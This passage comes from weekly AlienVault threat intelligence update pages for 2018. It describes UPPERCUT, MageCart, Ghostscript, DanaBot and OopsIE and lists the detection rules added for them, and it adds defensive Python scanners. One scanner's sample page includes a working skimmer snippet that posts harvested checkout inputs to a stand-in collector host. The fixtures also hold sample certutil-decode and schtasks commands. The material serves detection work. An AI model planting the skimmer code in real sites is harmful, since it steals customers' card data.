    Once operational, UPPERCUT contacts a hard-coded Command & Control domain. Said communications are Blowfish-encrypted using one of the multiple hard-coded Blowfish encryption keys.

    For USM Appliance, we've added NIDS signatures and the following correlation rule to detect CVE-2018-8459 exploits: 

    • Exploitation & Installation, WebServer Attack, Microsoft Edge Type Confusion Attempt (CVE-2018-8459)

    New Detection Techniques - MageCart

    MageCart is a card-skimming threat actor that focuses on stealing credit card details with malicious JavaScript code. Recently, MageCart was found to have compromised Inbenta, which supplies content for e-commerce websites such as Ticketmaster. As a result, a piece of malicious JavaScript was inserted into Ticketmaster's website. The injected code is fairly simple: it checks with a regular expression whether the browser is on a "checkout" page and, if so, hooks every form submission or button click. When the hook fires, the code gathers the data from all text inputs and sends it to a server controlled by MageCart.

    It appears, however, that Inbenta was not the only compromised organization, but rather the tip of the iceberg. SociaPlus, PushAssist, and Clarity Connect were also found to be compromised, according to RiskIQ.

    For USM Appliance, we've added NIDS signatures and the following correlation rule to detect MageCart activity: 

    • Exploitation & Installation, Client Side Exploit - Known Vulnerability, MageCart

    New Detection Techniques - Backdoors

    For USM Appliance, we've added the following correlation rules as a result of additional recent malicious activity:

    • System Compromise, Backdoor, UPPERCUT
    • System Compromise, Backdoor, WebShell by GHZ

    New Detection Techniques - Mobile Trojan Infection

    For USM Appliance, we've added NIDS signatures and the following correlation rules as a result of additional recent malicious activity:

    • System Compromise, Mobile trojan infection, Trojan-Downloader.AndroidOS.Agent.fj
    • System Compromise, Mobile trojan infection, Android/Triada.IHM
    • System Compromise, Mobile trojan infection, Android APT-C-23
    • System Compromise, Mobile trojan infection, Trojan-Dropper.AndroidOS.Wapnor.a
    • System Compromise, Mobile trojan infection, Trojan-Dropper.AndroidOS.Agent.hf

    New Detection Techniques - Trojan Infection

    For USM Appliance, we've added NIDS signatures and the following correlation rules as a result of additional recent malicious activity:

    • System Compromise, Trojan infection, Win32/Agent.ZJL
    • System Compromise, Trojan infection, Win32/Agent.XXYIUO
    • System Compromise, Trojan infection, W32.Bloat-A
    • System Compromise, Trojan infection, Win32.Unwaders.C
    • System Compromise, Trojan infection, Win32/ZeroEvil
    • System Compromise, Trojan infection, RektBot
    • System Compromise, Trojan infection, MSIL/Acrux Miner Stealer
    • System Compromise, Trojan infection, Win32/PSW.Agent.OFE
    • System Compromise, Trojan infection, Win32/PlugF
    • System Compromise, Trojan infection, Win32/ShamSalt
    • System Compromise, Trojan infection, Win32.ActiveAgent

    New Detection Techniques

    For USM Appliance, we've added NIDS signatures and the following correlation rules as a result of additional recent malicious activity:

    • System Compromise, C&C Communication, MageCart Exfil
    • System Compromise, C&C Communication, Agent Tesla
    • System Compromise, Ransomware infection, STOP Ransomware
    • System Compromise, C&C Communication, JadidBot CnC
    • System Compromise, Botnet infection, Fbot/Satori
    • System Compromise, Worm infection, Xbash
    • Exploitation & Installation, Service Exploit, NUUO NVR Peekaboo Vulnerability Check Inbound
    • Exploitation & Installation, Service Exploit, NUUO NVRMini2 3.8 RCE Inbound
    • Exploitation & Installation, Client Side Exploit - Known Vulnerability, Apache Pluto RCE (CVE-2018-1306)

    Updated Detection Techniques - Trojan Infection

    For USM Appliance, we've added NIDS signatures and the following correlation rules as a result of additional recent malicious activity:

    • System Compromise, Trojan infection, MalDoc
    • System Compromise, Trojan infection, W32/Kutaki
    • System Compromise, Trojan infection, Win32.DanaBot
    • System Compromise, Trojan infection, Zebrocy
    • System Compromise, Trojan infection, MinerLoader
    • System Compromise, Trojan infection, Win32/ZeroEvil

    Updated Detection Techniques - Mobile Trojan Infection

    For USM Appliance, we've added NIDS signatures and the following correlation rules as a result of additional recent malicious activity:

    • System Compromise, Mobile trojan infection, Asacub.a Banker
    • System Compromise, Mobile trojan infection, Android.SmsPay
    • System Compromise, Mobile trojan infection, TrojanDropper.Shedun
    • System Compromise, Mobile trojan infection, Android APT-C-23

    Updated Detection Technique – C&C Communication

    For USM Appliance, we've updated our IDS signatures to include the list of certificates identified by Abuse.ch to be associated with malware or botnet activities. The updated correlation rules use this information to detect command and control (C&C) communications related to several malware families, including:

    • System Compromise, C&C Communication, Revcode SSL activity
    • System Compromise, C&C Communication, Observed Malicious SSL Cert (MalDoc DL) SSL activity
    • System Compromise, C&C Communication, Known malicious SSL certificate
    • System Compromise, C&C Communication, MageCart Exfil

    Updated Correlation Rules

    For USM Appliance, we've added NIDS signatures and updated the following correlation rules as a result of additional recent malicious activity:

    • System Compromise, Worm infection, Ramnit
    • System Compromise, Worm infection, Phorpiex
    • System Compromise, Suspicious Behaviour, Suspicious user-agent detected
    • System Compromise, Malware infection, Tofsee
    • System Compromise, Malware infection, CoinMiner
    • System Compromise, Malicious website - Exploit Kit, Fallout EK
    • Delivery & Attack, Malicious website, Phishing activity
  • AlienVault Labs Threat Intelligence Update for USM Anywhere: September 16 – September 22, 2018

    New Detection Techniques - UPPERCUT backdoor

    The UPPERCUT backdoor, also called ANEL, is a backdoor used by the group APT10 in a recent campaign targeting the Japanese media sector. The backdoor is distributed via Macro-enabled Word documents with a traditional lure. The malicious document drops 3 files which then get decoded by certutil.exe. The dropped files are:

    1. GUP.exe: GUP, a legitimate open-source generic updater
    2. libcurl.dll: Malicious Loader DLL
    3. 3F2E3AB9: Encrypted shellcode

    The malicious document then executes the dropped GUP.exe, which loads the malicious libcurl.dll instead of the legitimate one (via DLL search order hijacking). Once loaded, the malicious DLL will load, decrypt, and execute the encrypted shellcode contained in the third file. The encrypted shellcode will then decompress and execute another embedded DLL. This latter DLL is the final stage payload.

    Once operational, UPPERCUT contacts a hard-coded Command & Control domain. Said communications are Blowfish-encrypted using one of the multiple hard-coded Blowfish encryption keys.

    For USM Anywhere, we've added NIDS signatures and the following correlation rules to detect CVE-2018-8459 exploits:

    • Delivery & Attack, Vulnerable Software Exploitation, Code Execution

    New Detection Techniques - MageCart

    MageCart is a card-skimming threat actor that focuses on stealing credit card details with malicious JavaScript code. Recently, MageCart was found to have compromised Inbenta, which supplies content for e-commerce websites such as Ticketmaster. As a result, a piece of malicious JavaScript was inserted into Ticketmaster's website. The injected code is fairly simple: it checks with a regular expression whether the browser is on a "checkout" page and, if so, hooks every form submission or button click. When the hook fires, the code gathers the data from all text inputs and sends it to a server controlled by MageCart.

    It appears, however, that Inbenta was not the only compromised organization, but rather the tip of the iceberg. SociaPlus, PushAssist, and Clarity Connect were also found to be compromised, according to RiskIQ.

    For USM Anywhere, we've added NIDS signatures and the following correlation rules to detect MageCart activity:

    • Delivery & Attack, Vulnerable Software Exploitation, Code Execution
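    A practical check for the skimmer pattern described above is to inspect a page's scripts for the combination of a checkout test, a form or click hook, input harvesting and an outbound send, and to flag any script host that is not first-party (the Inbenta case was a supplier's script, so the host check matters as much as the body check). The scanner below is an added example written for this page, not AlienVault's signature logic or any MageCart code; the HTML, the host names and the inline scripts it scans are constructed for the example, and the simplified inline snippet only mirrors the behaviour the text describes.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Textual signals making up the behaviour described above.  Each one is common
# in benign code; the combination inside a single script is what gets scored.
SIGNALS = {
    "checkout_test": re.compile(r"checkout", re.I),
    "form_hook": re.compile(r"""addEventListener\(\s*['"](submit|click)['"]|\.on(submit|click)\s*=""", re.I),
    "input_harvest": re.compile(r"""(getElementsByTagName|querySelectorAll)\(\s*['"]input['"]\s*\)""", re.I),
    "exfil": re.compile(r"XMLHttpRequest|\bfetch\s*\(|sendBeacon|new\s+Image\s*\(", re.I),
    "encoding": re.compile(r"\bbtoa\s*\(|\bencodeURIComponent\s*\(", re.I),
}


class ScriptCollector(HTMLParser):
    """Collects <script> elements: external ones by src, inline ones by body."""

    def __init__(self):
        super().__init__()
        self.external, self.inline = [], []
        self._buf = None

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._buf is not None:
            self.inline.append("".join(self._buf))
            self._buf = None


def scan_page(html, first_party_hosts):
    """Return (kind, detail) findings: unexpected script hosts and inline
    scripts that combine at least three signals including an outbound send."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.external:
        host = urlparse(src).hostname
        if host and host not in first_party_hosts:
            findings.append(("third_party_script", host))
    for body in parser.inline:
        hits = [name for name, rx in SIGNALS.items() if rx.search(body)]
        if len(hits) >= 3 and "exfil" in hits:
            findings.append(("skimmer_pattern", ",".join(hits)))
    return findings


# Constructed page: one first-party script, one supplier script, a benign
# analytics snippet, and an inline snippet mirroring the described skimmer.
SAMPLE_HTML = """
<html><head>
<script src="https://shop.example/static/app.js"></script>
<script src="https://cdn.widgets-vendor.example/chat.js"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  dataLayer.push({event: "pageview"});
</script>
<script>
if (/checkout/i.test(window.location.href)) {
  document.addEventListener("submit", function () {
    var out = {}, inputs = document.getElementsByTagName("input");
    for (var i = 0; i < inputs.length; i++) out[inputs[i].name] = inputs[i].value;
    var xhr = new XMLHttpRequest();
    xhr.open("POST", "https://collector.example/gate", true);
    xhr.send(btoa(JSON.stringify(out)));
  });
}
</script>
</head><body></body></html>
"""

if __name__ == "__main__":
    for kind, detail in scan_page(SAMPLE_HTML, {"shop.example"}):
        print(kind, detail)
```

    Run this against the rendered checkout page (after scripts have had a chance to inject further scripts), not just the static template, and keep the first-party host set tight: every host it reports is one that can read the payment form.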

    New Detection Techniques - Backdoors

    For USM Anywhere, we've updated the following correlation rule as a result of additional recent malicious activity, including UPPERCUT and WebShell by GHZ:

    • System Compromise, Malware, Backdoor

    New Detection Techniques - Mobile Trojan Infection

    For USM Anywhere, we've added NIDS signatures and updated the following correlation rules as a result of recent malicious activity, including Trojan-Downloader.AndroidOS.Agent.fj, Android/Triada.IHM, Android APT-C-23, Trojan-Dropper.AndroidOS.Wapnor.a, and Trojan-Dropper.AndroidOS.Agent.hf.

    • System Compromise, Malware, Trojan
    • System Compromise, Malware, Dropper
    • System Compromise, Malware, Downloader

    New Detection Techniques - Trojan Infection

    For USM Anywhere, we've added NIDS signatures and updated the following correlation rules as a result of recent malicious activity, including Win32/Agent.ZJL, Win32/Agent.XXYIUO, W32.Bloat-A, Win32.Unwaders.C, Win32/ZeroEvil, RektBot, MSIL/Acrux Miner Stealer, Win32/PSW.Agent.OFE, Win32/PlugF, Win32/ShamSalt, and Win32.ActiveAgent.

    • System Compromise, Malware Infection, Trojan

    New Detection Techniques

    For USM Anywhere, we've added NIDS signatures and updated the following correlation rules to detect additional recent malicious activity, including MageCart Exfil, Agent Tesla, STOP Ransomware, JadidBot CnC, Fbot/Satori, Xbash, NUUO NVR Peekaboo Vulnerability Check Inbound, NUUO NVRMini2 3.8 RCE Inbound, and Apache Pluto RCE (CVE-2018-1306):

    • System Compromise, Malware, Trojan
    • System Compromise, Malware, Ransomware
    • System Compromise, Malware, Suspicious SSL Certificate
    • Exploitation & Installation, Exploit, Vulnerability Scanner
    • Exploitation & Installation, Exploit, Code Execution

    Updated Detection Techniques - Trojan Infection

    For USM Anywhere, we've added NIDS signatures and updated the following correlation rules to detect additional recent malicious activity, including MalDoc, W32/Kutaki, Win32.DanaBot, Zebrocy, MinerLoader, and Win32/ZeroEvil:

    • System Compromise, Malware, Trojan

    Updated Detection Techniques - Mobile Trojan Infection

    For USM Anywhere, we've added NIDS signatures and updated the following correlation rules to detect additional recent malicious activity, including Asacub.a Banker, SmsSpy, and Trojan.AndroidOS.Boogr.gsh.

    • System Compromise, Malware, Trojan
    • System Compromise, Malware, Dropper
    • System Compromise, Malware, APT

    Updated Detection Technique – C&C Communication

    For USM Anywhere, we've updated our IDS signatures and the following correlation rule to include the list of certificates identified by Abuse.ch to be associated with malware or botnet activities:

    • System Compromise, Malware, Suspicious SSL Certificate

    Updated Correlation Rules

    For USM Anywhere, we've added NIDS signatures and the following correlation rules to detect additional recent malicious activity, including phishing activity, Ramnit, Phorpiex, Tofsee, CoinMiner, and Fallout EK:

    • System Compromise, Malware, Trojan
    • System Compromise, Malware, Worm
    • System Compromise, Suspicious Activity, Suspicious User-Agent
    • System Compromise, Suspicious Activity, Exploit Kit - Landing
    • Delivery & Attack, Suspicious Activity, Phishing
  • AlienVault Labs Threat Intelligence Update for USM Appliance: September 2 – September 8, 2018

    New Detection Techniques - GhostScript exploits

    GhostScript is a PostScript language interpreter. Its main purpose is to render page description languages such as PostScript and PDF in order to display or print document pages.

    Ghostscript provides an optional -dSAFER mode, which is supposed to prevent unsafe PostScript operations. However, multiple PostScript operations bypass the protections provided by -dSAFER, allowing an attacker to execute arbitrary commands with arbitrary arguments. The vulnerability can also be exploited through applications that leverage GhostScript (they pass PostScript, EPS or PDF input to it), such as ImageMagick, GraphicsMagick, evince, Okular, Nautilus, and others.

    We've added NIDS signatures and the following correlation rule to detect GhostScript exploit activity: 

    • Delivery & Attack, Vulnerable Software Exploitation, Code Execution

    New Detection Techniques - DanaBot

    DanaBot, a banking trojan targeting Australian users, first surfaced in May 2018. The malware is mainly distributed through phishing emails, which include a macro-enabled Word document. Once macros are allowed to run, the malicious macro will download DanaBot using a PowerShell command.

    The main DanaBot payload includes web injection and downloader features. Communication with the C&C server is carried over encrypted TCP traffic to port 443. The cipher used for network communications is AES-256, via Microsoft's CryptoAPI.

    We've added NIDS signatures and the following correlation rule to detect DanaBot activity: 

    • System Compromise, Malware Infection, Trojan

    New Detection Techniques - Exploits

    We've added the following correlation rules as a result of additional recent malicious activity:

    • Exploitation & Installation, Client Side Exploit - Known Vulnerability, ASUS DSL RCE (CVE-2018-15887)
    • Exploitation & Installation, Client Side Exploit - Known Vulnerability, Apache Struts memberAccess and getWriter inbound OGNL injection remote code execution

    New Detection Techniques - Trojan Infection

    We've added NIDS signatures and the following correlation rules as a result of additional recent malicious activity:

    • System Compromise, Trojan infection, EmeraldRabbit
    • System Compromise, Trojan infection, Generic Obfuscated Batch
    • System Compromise, Trojan infection, JavaScript Downloader
    • System Compromise, Trojan infection, MR.Dropper.KR
    • System Compromise, Trojan infection, Urelas
    • System Compromise, Trojan infection, W32.FakeEzQ.kr
    • System Compromise, Trojan infection, W32.Mandaph.Coinminer
    • System Compromise, Trojan infection, Win32/Occamy.C
    • System Compromise, Trojan infection, Win32/Presenoker
    • System Compromise, Ransomware infection, Shrug2
    • System Compromise, Ransomware infection, Thanatos Ransomware
    • System Compromise, Ransomware infection, Win32/Aura Ransomware

    New Detection Techniques

    We've added NIDS signatures and the following correlation rules as a result of additional recent malicious activity:

    • System Compromise, C&C Communication, Bancos Variant Downloader SSL Certificate
    • System Compromise, C&C Communication, MagentoCore
    • System Compromise, C&C Communication, Malicious SSL Cert (CobInt Downloader)
    • System Compromise, Malicious website - Exploit Kit, GreenFlash Sundown EK
    • System Compromise, Malware infection, CeidPageLock

    Updated Detection Techniques - Oilrig's OopsIE

    Oilrig, the Iran-linked APT group, is using a variant of the data-exfiltration OopsIE trojan to attack government entities in the Middle East. The group was identified in 2015 and is believed to be linked with the Iranian Intelligence agency and the Islamic Revolutionary Guard Corps (IRGC). They’re known for attacking energy, financial, aviation, infrastructure, government and university organizations, primarily in the Middle East.

    The OopsIE trojan is delivered via spear-phishing emails that attach a Word document with malicious macros. The macros use certutil to base64-decode the payload and scheduled tasks to execute the malicious payloads after a delay. The trojan is capable of:

    • Running commands on the target machine remotely
    • Downloading files from C&C
    • Uploading files to C&C

    Notably, the OopsIE trojan uses the InternetExplorer application object for its network communications, which are made with GZIP-encoded HTTP requests.

    We've added NIDS signatures and the following correlation rule to detect OopsIE activity: 

    • System Compromise, Trojan infection, Oilrig Stealer

    Updated Detection Techniques - Trojan Infection

    We've added NIDS signatures and the following correlation rules as a result of additional recent malicious activity:

    • System Compromise, Trojan infection, AgentTesla
    • System Compromise, Trojan infection, Generic PowerShell
    • System Compromise, Trojan infection, Helminth
    • System Compromise, Trojan infection, MSIL/Eredel Stealer
    • System Compromise, Trojan infection, Neshta
    • System Compromise, Trojan infection, Unknown PowerShell
    • System Compromise, Trojan infection, Ursniff
    • System Compromise, Trojan infection, Win32.DanaBot

    Updated Detection Technique – Malware SSL Certificates

    We've updated our IDS signatures to include the list of certificates identified by Abuse.ch to be associated with malware or botnet activities. The updated correlation rules use this information to detect command and control (C&C) communications related to several malware families, including:

    • System Compromise, C&C Communication, Cobalt Group SSL
    • System Compromise, C&C Communication, Known malicious SSL certificate
    • System Compromise, C&C Communication, Ursnif SSL activity

    Updated Correlation Rules

    We've added NIDS signatures and updated the following correlation rules as a result of additional recent malicious activity:

    • Exploitation & Installation, Client Side Exploit - Known Vulnerability, Ghostscript invalidcheck escape attempt
    • Exploitation & Installation, Malicious website - Exploit Kit, Magnitude EK
    • System Compromise, Malicious website - Exploit Kit, GreenFlash Sundown EK
    • System Compromise, Malware RAT, Remcos/Remvio
    • System Compromise, Malware infection, CoinMiner
    • System Compromise, Mobile trojan infection, Asacub.a Banker
    • System Compromise, Mobile trojan infection, SmsSpy
    • System Compromise, Mobile trojan infection, Trojan.AndroidOS.Boogr.gsh
    • System Compromise, Targeted Malware, APT32
  • AlienVault Labs Threat Intelligence Update for USM Anywhere: September 2 – September 8, 2018

    New Detection Techniques - GhostScript exploits

    GhostScript is a PostScript language interpreter. Its main purpose is to render page description languages such as PostScript and PDF in order to display or print document pages.

    Ghostscript provides an optional -dSAFER mode, which is supposed to prevent unsafe PostScript operations. However, multiple PostScript operations bypass the protections provided by -dSAFER, allowing an attacker to execute arbitrary commands with arbitrary arguments. The vulnerability can also be exploited through applications that leverage GhostScript (they pass PostScript, EPS or PDF input to it), such as ImageMagick, GraphicsMagick, evince, Okular, Nautilus, and others.

    For USM Anywhere, we've added NIDS signatures and the following correlation rules to detect GhostScript exploit activity:

    • Exploitation & Installation, Client Side Exploit - Known Vulnerability, Ghostscript illegal delete bindnow attempt
    • Exploitation & Installation, Client Side Exploit - Known Vulnerability, Ghostscript illegal read undefinedfilename attempt
    • Exploitation & Installation, Client Side Exploit - Known Vulnerability, Ghostscript invalidcheck escape attempt
    • Exploitation & Installation, Client Side Exploit - Known Vulnerability, Ghostscript type confusion attempt
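    Because ImageMagick and similar tools pick the decoder from a file's content rather than its name, an uploaded "image" that is really PostScript or PDF reaches the Ghostscript delegate, which is how the -dSAFER bypasses above get triggered server-side. The check below is an added example for this page, not code from Ghostscript, ImageMagick or AlienVault: it sniffs the leading bytes of an upload, refuses anything Ghostscript would be asked to handle, and rejects extension/content mismatches. The sample files are constructed byte strings.

```python
from typing import Optional, Tuple

# Leading bytes of the raster formats an upload endpoint usually intends to accept.
MAGIC = [
    (b"\xff\xd8\xff", "jpeg"),
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"GIF87a", "gif"),
    (b"GIF89a", "gif"),
]
# Content that ImageMagick/GraphicsMagick hand to the Ghostscript delegate:
# PostScript/EPS ("%!"), PDF, and the DOS EPS binary header.
GS_MARKERS = [b"%!", b"%PDF-", b"\xc5\xd0\xd3\xc6"]
EXT_KIND = {"jpg": "jpeg", "jpeg": "jpeg", "png": "png", "gif": "gif"}


def sniff(data: bytes) -> Optional[str]:
    """Classify by content: a known raster type, 'ghostscript', or None."""
    for magic, kind in MAGIC:
        if data.startswith(magic):
            return kind
    # PostScript readers tolerate leading whitespace, so strip it before looking.
    body = data.lstrip(b" \t\r\n")
    if any(body.startswith(m) for m in GS_MARKERS):
        return "ghostscript"
    return None


def accept_upload(data: bytes, filename: str) -> Tuple[bool, str]:
    """Decide whether an upload may be passed to an image-processing delegate.

    Refuses Ghostscript-bound content outright, refuses unknown containers, and
    refuses files whose extension disagrees with what the bytes actually are.
    """
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    kind = sniff(data)
    if kind == "ghostscript":
        return False, "content is PostScript/PDF and would be delegated to Ghostscript"
    if kind is None:
        return False, "unrecognised container"
    if EXT_KIND.get(ext) != kind:
        return False, f"extension .{ext} does not match detected {kind}"
    return True, kind


# Constructed sample uploads (minimal headers, not real images).
SAMPLES = {
    "photo.jpg": b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 16,
    "logo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,
    # PostScript with a .jpg name: the classic route into the Ghostscript delegate.
    "avatar.jpg": b"\n%!PS-Adobe-3.0\n/Helvetica findfont 12 scalefont setfont\nshowpage\n",
    "scan.jpeg": b"%PDF-1.4\n%\xe2\xe3\xcf\xd3\n",
    "bad.png": b"\xff\xd8\xff\xe0" + b"\x00" * 8,  # JPEG bytes under a .png name
}

if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        print(name, accept_upload(blob, name))
```

    This check belongs in front of the converter, not instead of patching: it stops the polyglot-upload path, while the PS, EPS and PDF coders can additionally be disabled in ImageMagick's policy.xml so that Ghostscript is never invoked by the image pipeline at all.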

    New Detection Techniques - DanaBot

    DanaBot, a banking trojan targeting Australian users, first surfaced in May 2018. The malware is mainly distributed through phishing emails, which include a macro-enabled Word document. Once macros are allowed to run, the malicious macro will download DanaBot using a PowerShell command.

    The main DanaBot payload includes web injection and downloader features. Communication with the C&C server is carried over encrypted TCP traffic to port 443. The cipher used for network communications is AES-256, via Microsoft's CryptoAPI.

    For USM Anywhere, we've added NIDS signatures and the following correlation rules to detect DanaBot activity:

    • System Compromise, Trojan infection, Win32/DanaBot

    New Detection Techniques - Exploits

    For USM Anywhere, we've updated the following correlation rule as a result of additional recent malicious activity:

    • Delivery & Attack, Vulnerable Software Exploitation, Code Execution

    New Detection Techniques - Trojan Infection

    For USM Anywhere, we've added NIDS signatures and updated the following correlation rules as a result of recent malicious activity, including EmeraldRabbit, Urelas, W32.FakeEzQ.kr, W32.Mandaph.Coinminer, Win32/Occamy.C, Win32/Presenoker, Shrug2, Thanatos Ransomware, and Aura Ransomware:

    • System Compromise, Malware Infection, Downloader
    • System Compromise, Malware Infection, Potentially Unwanted Program
    • System Compromise, Malware Infection, Trojan
    • System Compromise, Malware Infection, Ransomware

    New Detection Techniques

    For USM Anywhere, we've added NIDS signatures and updated the following correlation rules to detect additional recent malicious activity, including MagentoCore, Bancos Variant Downloader SSL Certificate, CobInt Downloader, GreenFlash Sundown EK, and CeidPageLock: 

    • Delivery & Attack, Malware Infection, Suspicious SSL Certificate
    • Delivery & Attack, Malware Infection, Exploit Kit - Landing
    • System Compromise, Malware Infection, Trojan

    Updated Detection Techniques - Oilrig's OopsIE

    Oilrig, the Iran-linked APT group, is using a variant of the data-exfiltration OopsIE trojan to attack government entities in the Middle East. The group was identified in 2015 and is believed to be linked with the Iranian Intelligence agency and the Islamic Revolutionary Guard Corps (IRGC). They’re known for attacking energy, financial, aviation, infrastructure, government and university organizations, primarily in the Middle East.

    The OopsIE trojan is delivered via spear-phishing emails that attach a Word document with malicious macros. The macros use certutil to base64-decode the payload and scheduled tasks to execute the malicious payloads after a delay. The trojan is capable of:

    • Running commands on the target machine remotely
    • Downloading files from C&C
    • Uploading files to C&C

    Notably, the OopsIE trojan uses the InternetExplorer application object for its network communications, which are made with GZIP-encoded HTTP requests.

    For USM Anywhere, we've added NIDS signatures and the following correlation rules to detect OopsIE:

    • System Compromise, Malware Infection, APT
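    Both UPPERCUT and OopsIE, as described above, start from an Office macro that calls certutil to decode a dropped payload, then rely on a scheduled task (OopsIE) or on a legitimate executable side-loading an unsigned DLL from the drop directory (UPPERCUT). The block below is an added example of host-side detection logic for that chain, written for this page rather than taken from AlienVault's correlation rules. It runs over constructed process-creation and image-load records shaped like Sysmon events; the host names, paths, file names and field names are assumptions made for the example.

```python
import json
import ntpath
import re
from collections import defaultdict

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
LOLBINS = {"certutil.exe", "schtasks.exe", "cmd.exe", "powershell.exe", "wscript.exe",
           "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Public|ProgramData|Users\\[^\\]+\\Downloads)\\", re.I)
CERTUTIL_DECODE = re.compile(r"\s-(decode|decodehex|urlcache)\b", re.I)
SCHTASKS_CREATE = re.compile(r"\s/create\b", re.I)


def _base(path):
    return ntpath.basename(path).lower()


def detect(event_lines):
    """Run the rules over JSON event lines; return (findings, hosts_with_full_chain).

    findings are (host, rule, detail) tuples; a host is reported as a full
    chain when an Office process spawned a LOLBin, certutil decoded something,
    and either a task was scheduled from a user-writable path or an unsigned
    DLL was side-loaded from one.
    """
    findings, per_host = [], defaultdict(set)

    def tag(host, rule, detail):
        findings.append((host, rule, detail))
        per_host[host].add(rule)

    for line in event_lines.strip().splitlines():
        ev = json.loads(line)
        host = ev["Computer"]
        if ev["EventID"] == 1:  # process creation
            img, parent, cmd = _base(ev["Image"]), _base(ev["ParentImage"]), ev["CommandLine"]
            if parent in OFFICE and img in LOLBINS:
                tag(host, "office_spawns_lolbin", f"{parent} -> {img}")
            if img == "certutil.exe" and CERTUTIL_DECODE.search(cmd):
                tag(host, "certutil_decode", cmd)
            if img == "schtasks.exe" and SCHTASKS_CREATE.search(cmd) and USER_WRITABLE.search(cmd):
                tag(host, "schtasks_user_writable", cmd)
        elif ev["EventID"] == 7:  # image (DLL) load
            exe, dll = ev["Image"], ev["ImageLoaded"]
            same_dir = ntpath.dirname(exe).lower() == ntpath.dirname(dll).lower()
            if (dll.lower().endswith(".dll") and same_dir and USER_WRITABLE.search(dll)
                    and str(ev.get("Signed", "")).lower() != "true"):
                tag(host, "unsigned_dll_sideload", f"{_base(exe)} loaded {dll}")

    chain = [h for h, rules in per_host.items()
             if {"office_spawns_lolbin", "certutil_decode"} <= rules
             and rules & {"schtasks_user_writable", "unsigned_dll_sideload"}]
    return findings, chain


# Constructed records in the shape of Sysmon EventID 1 (process create) and
# EventID 7 (image load), reduced to the fields the rules need.  WS01 carries
# the macro -> certutil -> schtasks/side-load chain; WS02 is benign noise.
SAMPLE_EVENTS = r"""
{"EventID": 1, "Computer": "WS01", "Image": "C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE", "CommandLine": "\"C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE\" /n Invoice.doc", "ParentImage": "C:\\Windows\\explorer.exe"}
{"EventID": 1, "Computer": "WS01", "Image": "C:\\Windows\\System32\\certutil.exe", "CommandLine": "certutil -decode C:\\Users\\bob\\AppData\\Local\\Temp\\stage.txt C:\\Users\\bob\\AppData\\Local\\Temp\\GUP.exe", "ParentImage": "C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE"}
{"EventID": 1, "Computer": "WS01", "Image": "C:\\Windows\\System32\\schtasks.exe", "CommandLine": "schtasks /create /sc minute /mo 3 /tn Updater /tr C:\\Users\\bob\\AppData\\Local\\Temp\\GUP.exe", "ParentImage": "C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE"}
{"EventID": 7, "Computer": "WS01", "Image": "C:\\Users\\bob\\AppData\\Local\\Temp\\GUP.exe", "ImageLoaded": "C:\\Users\\bob\\AppData\\Local\\Temp\\libcurl.dll", "Signed": "false"}
{"EventID": 1, "Computer": "WS02", "Image": "C:\\Windows\\System32\\certutil.exe", "CommandLine": "certutil -verify -urlfetch cert.cer", "ParentImage": "C:\\Windows\\System32\\cmd.exe"}
{"EventID": 7, "Computer": "WS02", "Image": "C:\\Program Files\\SomeVendor\\updater\\GUP.exe", "ImageLoaded": "C:\\Program Files\\SomeVendor\\updater\\libcurl.dll", "Signed": "true"}
"""

if __name__ == "__main__":
    found, chained = detect(SAMPLE_EVENTS)
    for f in found:
        print(f)
    print("full chain on:", chained)
```

    The individual rules are noisy on their own (administrators do run certutil and schtasks), which is why the chain condition keys on the Office parent and the user-writable drop directory; the side-load rule deliberately ignores signed DLLs living beside their executable under Program Files, as in the WS02 records.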

    Updated Detection Techniques - Trojan Infection

    For USM Anywhere, we've added NIDS signatures and the following correlation rules to detect additional recent malicious activity, including AgentTesla, Helminth, MSIL/Eredel Stealer, Neshta, Ursniff, and Win32.DanaBot.

    • System Compromise, Malware Infection, Generic
    • System Compromise, Malware Infection, Spyware
    • System Compromise, Malware Infection, Trojan

    Updated Detection Technique – Malware SSL Certificates

    For USM Anywhere, we've updated our IDS signatures and the following correlation rule to include the list of certificates identified by Abuse.ch as associated with malware or botnet activity:

    • System Compromise, Malware Infection, Malicious SSL Certificate

    Updated Correlation Rules

    For USM Anywhere, we've added NIDS signatures and the following correlation rules to detect additional recent malicious activity:

    • Delivery & Attack, Vulnerable Software Exploitation, Code Execution
    • Delivery & Attack, Malware Infection, Exploit Kit - Landing
    • System Compromise, Exploit, Code Execution
    • System Compromise, Malware Infection, Malicious Stratum Authline
    • System Compromise, Malware Infection, Remote Access Trojan
    • System Compromise, Malware Infection, Trojan
    • System Compromise, Malware Infection, Spyware
    • System Compromise, Malware Infection, APT
  • AlienVault Labs Threat Intelligence Update for USM Appliance: August 12 – August 18, 2018

    New Detection Techniques - Marap

    Marap is a multi-functional malware that was recently used in an aggressive spear-phishing campaign targeting financial entities. Marap is very flexible and can extend its capabilities by downloading additional modules. It can swap its installed exploits or payloads, allowing it to act as a downloader for many different strains of malware. It also contains reconnaissance modules that collect data from the target system, such as username, domain name, hostname, IP address, language, country, OS version, Microsoft Outlook .ost file names, and installed anti-virus software.

    It includes anti-analysis features such as string obfuscation and sandbox detection. It also makes use of an encrypted configuration file, 'sign.bin', which contains the parameters needed for its C&C communication. This traffic goes over plain HTTP, with the option of configuring a proxy to avoid direct communication with the server.

    We've added NIDS signatures and the following correlation rule to detect Marap activity: 

    • System Compromise, Malware Infection, Trojan

    Related content in Open Threat Exchange: https://otx.alienvault.com/pulse/5b7611e862be317557a98d43

    New Detection Techniques - MAFIA Ransom

